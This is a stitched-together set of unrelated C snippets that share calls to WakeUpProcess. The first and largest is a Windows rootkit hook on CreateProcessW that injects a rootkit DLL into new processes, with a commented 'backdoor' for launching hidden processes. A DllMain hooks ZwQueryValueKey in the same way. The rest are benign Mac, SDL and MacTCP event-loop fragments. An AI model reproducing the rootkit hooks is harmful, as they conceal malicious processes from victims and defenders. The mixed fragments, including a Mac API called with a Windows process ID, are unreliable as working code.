// Backdoor : if application name or command line contains RTK_FILE_CHAR
// the created process is *not* hooked.
// Useful to launch hidden process from windows gui/cmd.exe that performs
// a search before delegating the creation of the process to CreateProcess
// To launch a non hijacked process using cmd, do the following :
// run: cmd.exe
// type: cmd.exe _nti (where _nti is RTK_FILE_CHAR )
// then run your hidden program from the non hijacked shell
BOOL WINAPI MyCreateProcessW(LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment,
LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation)
{
int bResult, bInject=1;
char msg[1024], cmdline[256], appname[256];
OutputString("[i] CreateProcessW()\n");
// do not rely on info given by HijackApi() since we may have hijacked at GetProcAddress() level
if(!fCreateProcessW) {
fCreateProcessW = (FARPROC) fGetProcAddress(GetModuleHandle("kernel32.dll"),"CreateProcessW");
if(!fCreateProcessW) return 0;
}
my_memset(msg, 0, 1024);
my_memset(cmdline, 0, 256);
my_memset(appname, 0, 256);
//Convert strings from unicode :
WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpApplicationName, -1, appname, 255,NULL, NULL);
WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpCommandLine, -1, cmdline, 255,NULL, NULL);
OutputString("\n[!!] Hooked CreateProcessW : %s - %s, injecting rootkit (%s)...\n", (char*)appname, (char*)cmdline, (char*)kNTIDllPath);
bResult = (int) fCreateProcessW((const unsigned short *)lpApplicationName,
(unsigned short *)lpCommandLine, lpProcessAttributes, lpThreadAttributes,
bInheritHandles, CREATE_SUSPENDED /*dwCreationFlags*/,
lpEnvironment, (const unsigned short *)lpCurrentDirectory,
(struct _STARTUPINFOW *)lpStartupInfo, lpProcessInformation);
// inject the created process if its name & command line doesn't contain RTK_FILE_CHAR
if(bResult)
{
if(lpCommandLine) {
if(strstr((char*)cmdline,(char*)RTK_FILE_CHAR)){
OutputString("\n[i] CreateProcessW: Giving true sight to process '%s'...\n", (char*)appname);
WakeUpProcess(lpProcessInformation->dwProcessId);
bInject = 0;
}
}
if(lpApplicationName) {
if(strstr((char*)appname,(char*)RTK_FILE_CHAR)) {
OutputString("\n[i] CreateProcessW: Giving true sight to process '%s'...\n", (char*)appname);
WakeUpProcess(lpProcessInformation->dwProcessId);
bInject = 0;
}
}
if(bInject) InjectDll(lpProcessInformation->hProcess, (char*)kNTIDllPath);
CloseHandle(lpProcessInformation->hProcess);
CloseHandle(lpProcessInformation->hThread);
}
return bResult;
}
void SetStaticText(int id, const char *text)
{
ControlRef cref=GetControl(id);
SetControlData(cref,kControlNoPart,kControlStaticTextTextTag,strlen(text),text);
DrawOneControl(cref);
// HACKY: wake up event loop to update display
ProcessSerialNumber psn={0,kCurrentProcess};
WakeUpProcess(&psn);
}
/* Our Stub routine to set up and then call the real routine. */
pascal void TimerCallbackProc(TMTaskPtr tmTaskPtr)
{
Uint32 ms;
WakeUpProcess(&((ExtendedTimerPtr) tmTaskPtr)->taskPSN);
ms = SDL_alarm_callback(SDL_alarm_interval);
if ( ms ) {
SDL_alarm_interval = ROUND_RESOLUTION(ms);
PrimeTime((QElemPtr)&gExtendedTimerRec.tmTask,
SDL_alarm_interval);
} else {
SDL_alarm_interval = 0;
}
}
// Queue a stream for polling in the event loop.
// May be called in interrupt.
void StreamWait(Stream *stream)
{
if (stream->qType) {
// already in the queue
return;
}
// add the stream to the queue
stream->qType = true;
Enqueue((QElemPtr)stream, &readyStreams);
// trigger our event loop to take control
if (hasPSN) {
WakeUpProcess(&psn);
}
}
BOOL WINAPI DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
if(ul_reason_for_call == DLL_PROCESS_ATTACH)
{
if(HookApi("ntdll.dll", "ZwQueryValueKey", (DWORD)&MyZwQueryValueKey,
&fZwQueryValueKey))
OutputDebugString("ZwQueryValueKey hook: OK.\n");
else
OutputDebugString("ZwQueryValueKey hook: FAILED.\n");
WakeUpProcess(0);
}
return TRUE;
}
static pascal void
mactcp_asr(StreamPtr str, unsigned short event, Ptr cookie,
unsigned short termin_reason, struct ICMPReport * icmp)
{
WakeUpProcess(&psn);
}
